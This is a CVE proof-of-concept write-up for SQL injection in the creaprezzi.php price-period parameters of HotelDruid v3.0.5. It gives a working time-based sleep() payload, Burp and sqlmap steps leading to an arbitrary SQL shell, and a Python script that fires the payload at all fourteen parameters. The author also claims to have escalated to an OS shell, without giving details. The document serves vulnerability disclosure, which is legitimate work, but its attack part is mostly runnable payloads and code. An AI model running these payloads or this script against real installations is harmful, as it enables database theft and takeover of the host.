# CVE-2023-33817 - SQL Injection found in HotelDruid V3.0.5
HotelDruid v3.0.5 is vulnerable to SQL injection. An authenticated attacker can issue arbitrary SQL statements through the affected parameters to retrieve data from the database and, depending on the privileges and configuration of the database server, escalate further towards code execution on the database host.
This is my second repo. Don't beat me if I didn't explain well.
Description of product: HotelDruid is an open source hotel management program (property management software) developed by DigitalDruid.Net.
Description of vulnerability: The web application allows any authenticated user (an admin or any other account that can reach the page) to inject SQL through the affected parameters of creaprezzi.php. The values are used in a database query without being properly escaped or parameterised, so an attacker can retrieve data from the database and, depending on database privileges, go further towards code execution on the target system. The steps to reproduce are below (again, don't beat me if I didn't explain well).
Affected webpage: creaprezzi.php

Affected parameters/components (the start and end date of each of the seven price periods):

- inizioperiodo1
- fineperiodo1
- inizioperiodo2
- fineperiodo2
- inizioperiodo3
- fineperiodo3
- inizioperiodo4
- fineperiodo4
- inizioperiodo5
- fineperiodo5
- inizioperiodo6
- fineperiodo6
- inizioperiodo7
- fineperiodo7
Step 1: Log in and navigate to creaprezzi.php; the highlighted part of the screenshot below is the affected parameter in the GUI.

Step 2: Intercept the request with Burp Suite and replace the parameter value with a basic time-based payload such as `'%2b(select*from(select(sleep(5)))a)%2b'` (URL-decoded: `'+(select*from(select(sleep(5)))a)+'`, which closes the string literal, adds an arithmetic expression containing a derived-table subquery that calls MySQL's `sleep(5)`, and reopens the literal), then monitor the response. The screenshot below shows the server returning its response only after 5 seconds, so the injected subquery is being executed by the database and it seems we can go a bit deeper :-). Compare the timing against an unmodified request and repeat with a different sleep value (for example 10) to rule out ordinary network or server latency.

Step 3: Save the intercepted request from Burp to a file and pass it to sqlmap. The screenshot below shows sqlmap's result.

Step 4: We can go a bit further with sqlmap; I chose its `--sql-shell` option. The screenshot below shows that we can execute arbitrary SQL statements by abusing the vulnerable parameter.

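To make the timing check from Step 2 repeatable across all fourteen parameters, here is a small time-based blind SQL injection probe. It is an added example, not code from the original PoC or from HotelDruid, and it assumes a lab install of HotelDruid v3.0.5 at a hypothetical `base_url`, a session cookie copied from an authenticated Burp request, and that creaprezzi.php is submitted as an HTTP POST; the other form fields the page requires are not known here and must be copied from the intercepted request into `extra_fields`.

```python
"""Added example (not part of the original PoC or HotelDruid): a time-based
blind SQL injection probe for the creaprezzi.php periodo parameters.

Assumptions (not taken from the write-up):
  - base_url points at a lab install of HotelDruid v3.0.5 you are allowed to test
  - the session cookie is copied from an authenticated Burp request
  - creaprezzi.php is submitted as an HTTP POST; the other form fields required
    by the page are unknown here and must be supplied in `extra_fields`
"""
import time
import urllib.error
import urllib.parse
import urllib.request

# The 14 parameters listed in the advisory: inizioperiodo1..7 and fineperiodo1..7
PERIOD_PARAMS = [f"{name}{i}" for i in range(1, 8)
                 for name in ("inizioperiodo", "fineperiodo")]


def sleep_payload(seconds: int) -> str:
    """The write-up's payload, URL-decoded: close the string literal, add a
    derived-table subquery that calls MySQL sleep(), reopen the literal."""
    return f"'+(select*from(select(sleep({seconds})))a)+'"


def build_body(fields: dict, target: str, payload: str) -> str:
    """Form body with `target` replaced by the payload. urlencode percent-encodes
    the quote and plus signs, which is why the write-up shows %2b."""
    data = dict(fields)
    data[target] = payload
    return urllib.parse.urlencode(data)


def looks_injectable(baseline: float, delayed: float, sleep_seconds: int,
                     slack: float = 1.0) -> bool:
    """Decide whether the measured delay is explained by the injected sleep().
    One slow response proves nothing, so the caller compares against a baseline
    request; repeat with a different sleep value before trusting the result."""
    return (delayed - baseline) >= (sleep_seconds - slack)


def timed_post(url: str, body: str, cookie: str, timeout: float) -> float:
    """POST the form body and return the wall-clock round trip in seconds."""
    req = urllib.request.Request(
        url, data=body.encode(), method="POST",
        headers={"Cookie": cookie,
                 "Content-Type": "application/x-www-form-urlencoded"})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass  # an error page still tells us how long the query took
    return time.monotonic() - start


def probe_parameter(base_url: str, cookie: str, target: str,
                    extra_fields: dict, sleep_seconds: int = 5) -> bool:
    """Send a benign request, then the same request with sleep() injected
    into `target`, and report whether the delay matches the injected sleep."""
    url = base_url.rstrip("/") + "/creaprezzi.php"
    benign = dict(extra_fields)
    benign.setdefault(target, "1")  # hypothetical benign value for the baseline
    timeout = sleep_seconds * 4
    baseline = timed_post(url, urllib.parse.urlencode(benign), cookie, timeout)
    injected = build_body(benign, target, sleep_payload(sleep_seconds))
    delayed = timed_post(url, injected, cookie, timeout)
    return looks_injectable(baseline, delayed, sleep_seconds)


if __name__ == "__main__":
    # Hypothetical lab values; replace with your own authenticated request data.
    for param in PERIOD_PARAMS:
        hit = probe_parameter("http://127.0.0.1/hoteldruid",
                              "PHPSESSID=<session-from-burp>", param, {})
        print(f"{param}: {'time-based SQLi' if hit else 'no delay'}")
```

`sleep()` is MySQL-specific; against another database backend the delay function has to change. Once a parameter is confirmed this way, the sqlmap step in the write-up corresponds to feeding the saved Burp request to sqlmap with `-r` and using `--sql-shell`, which are standard sqlmap options.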
PS: The steps above are just the PoC for the vendor. I actually climbed from the sql-shell to a full OS command shell, but that needs many more steps and techniques, and I think it is beyond what the CVE request asks us to demonstrate.
The screenshot below shows the version of HotelDruid.
